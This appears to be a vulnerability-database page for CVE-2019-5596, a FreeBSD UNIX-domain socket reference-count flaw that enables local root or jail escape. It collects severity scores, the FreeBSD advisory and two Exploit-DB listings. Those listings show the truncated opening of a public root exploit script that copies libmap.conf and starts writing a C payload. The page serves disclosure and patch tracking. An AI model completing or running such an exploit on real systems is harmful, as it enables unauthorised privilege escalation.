CVE-2019-5596
published 2019-02-12CVE-2019-5596: In FreeBSD 11.2-STABLE after r338618 and before r343786, 12.0-STABLE before r343781, and 12.0-RELEASE before 12.0-RELEASE-p3, a bug in the reference count…
PriorityP351high8.8CVSS 3.0
AVLACLPRLUINSCCHIHAH
EXPLOIT
EPSS
1.23%
65.2th percentile
In FreeBSD 11.2-STABLE after r338618 and before r343786, 12.0-STABLE before r343781, and 12.0-RELEASE before 12.0-RELEASE-p3, a bug in the reference count implementation for UNIX domain sockets can cause a file structure to be incorrectly released potentially allowing a malicious local user to gain root privileges or escape from a jail.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| freebsd | freebsd | — | — |
| freebsd | freebsd | — | — |
| freebsd | freebsd | — | — |
CVSS provenance
nvdv3.08.8HIGHCVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
nvdv2.07.2HIGHAV:L/AC:L/Au:N/C:C/I:C/A:C
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-89xf-9vcr-5475: In FreeBSD 11
ghsa_unreviewed·2022-05-13
CVE-2019-5596 [HIGH] GHSA-89xf-9vcr-5475: In FreeBSD 11
In FreeBSD 11.2-STABLE after r338618 and before r343786, 12.0-STABLE before r343781, and 12.0-RELEASE before 12.0-RELEASE-p3, a bug in the reference count implementation for UNIX domain sockets can cause a file structure to be incorrectly released potentially allowing a malicious local user to gain root privileges or escape from a jail.
BSD
FreeBSD-SA-19:02.fd: File description reference count leak
bsd_advisories·2019-02-05·CVSS 8.8
CVE-2019-5596 [HIGH] FreeBSD-SA-19:02.fd: File description reference count leak
FreeBSD-SA-19:02.fd Security Advisory
The FreeBSD Project
Topic: File description reference count leak
Category: core
Module: unix
Announced: 2019-02-05
Credits: Peter Holm
Affects: FreeBSD 12.0
Corrected: 2019-02-05 17:56:22 UTC (stable/12, 12.0-STABLE)
2019-02-05 18:11:15 UTC (releng/12.0, 12.0-RELEASE-p3)
2019-02-05 17:57:30 UTC (stable/11, 11.2-STABLE)
CVE Name: CVE-2019-5596
For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit .
I. Background
UNIX-domain sockets are used for inter-process communication. It is
possible to use UNIX-domain sockets to transfer rights, encoded as file
descriptors, to another process.
II. Problem Description
FreeBSD 12.0 attempts to handl
No detection rules found.
Exploit-DB
FreeBSD-SA-19:02.fd - Privilege Escalation
exploitdb·2019-12-30·CVSS 8.8
CVE-2019-5596 [HIGH] FreeBSD-SA-19:02.fd - Privilege Escalation
FreeBSD-SA-19:02.fd - Privilege Escalation
---
# Exploit: FreeBSD-SA-19:02.fd - Privilege Escalation
# Date: 2019-12-30
# Author: Karsten König of Secfault Security
# Twitter: @gr4yf0x
# Kudos: Maik, greg and Dirk for discussion and inspiration
# CVE: CVE-2019-5596
# libmap.conf primitive inspired by kcope's 2005 exploit for Qpopper
#!/bin/sh
echo "[+] Root Exploit for FreeBSD-SA-19:02.fd by Secfault Security"
umask 0000
if [ ! -f /etc/libmap.conf ]; then
echo "[!] libmap.conf has to exist"
exit
fi
cp /etc/libmap.conf ./
cat > heavy_cyber_weapon.c
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define N_FDS 0xfe
#define N_OPEN 0x2
#define N 1000000
#define NUM_THREADS 400
#define NUM_
Exploit-DB
FreeBSD 12.0 - 'fd' Local Privilege Escalation
exploitdb·2019-07-10
CVE-2019-5596 FreeBSD 12.0 - 'fd' Local Privilege Escalation
FreeBSD 12.0 - 'fd' Local Privilege Escalation
---
#!/bin/sh
# Exploit script for FreeBSD-SA-19:02.fd
#
# Author: Karsten König of Secfault Security
# Contact: [email protected]
# Twitter: @gr4yf0x
# Kudos: Maik, greg and Dirk for discussion and inspiration
#
# libmap.conf primitive inspired by kcope's 2005 exploit for Qpopper
echo "[+] Root Exploit for FreeBSD-SA-19:02.fd by Secfault Security"
umask 0000
if [ ! -f /etc/libmap.conf ]; then
echo "[!] libmap.conf has to exist"
exit
fi
cp /etc/libmap.conf ./
cat > heavy_cyber_weapon.c
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define N_FDS 0xfe
#define N_OPEN 0x2
#define N 1000000
#define NUM_THREADS 400
#define NUM_FORK
No writeups or analysis indexed.
2019-02-12
Published